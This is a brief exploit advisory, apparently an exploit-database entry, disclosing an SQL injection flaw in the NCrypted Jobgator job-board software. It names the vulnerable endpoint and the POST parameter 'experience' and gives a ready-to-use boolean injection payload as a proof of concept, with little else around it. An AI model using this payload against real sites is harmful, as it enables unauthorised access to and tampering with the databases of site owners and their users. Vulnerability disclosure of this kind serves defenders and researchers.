Jobgator suffers from a remote SQL injection vulnerability. Affects the latest version available as of March 5, 2019.
46763807f63e1aface3102aeb8c31de45e1f7461e74eae0b7bedfae530620e90
# Exploit Title: NCrypted Jobgator - SQL Injection
# Date: 05.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.ncrypted.net/jobgator/
# Demo Site: https://demo.ncryptedprojects.com/jobgator/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A
----- PoC 1: SQLi -----
Request: http://localhost/[PATH]/agents/Find-Jobs
Vulnerable Parameter: experience (POST)
Payload: btnsearch=Search&experience=1" OR NOT
4365=4365#&job_title=Mr.&location=1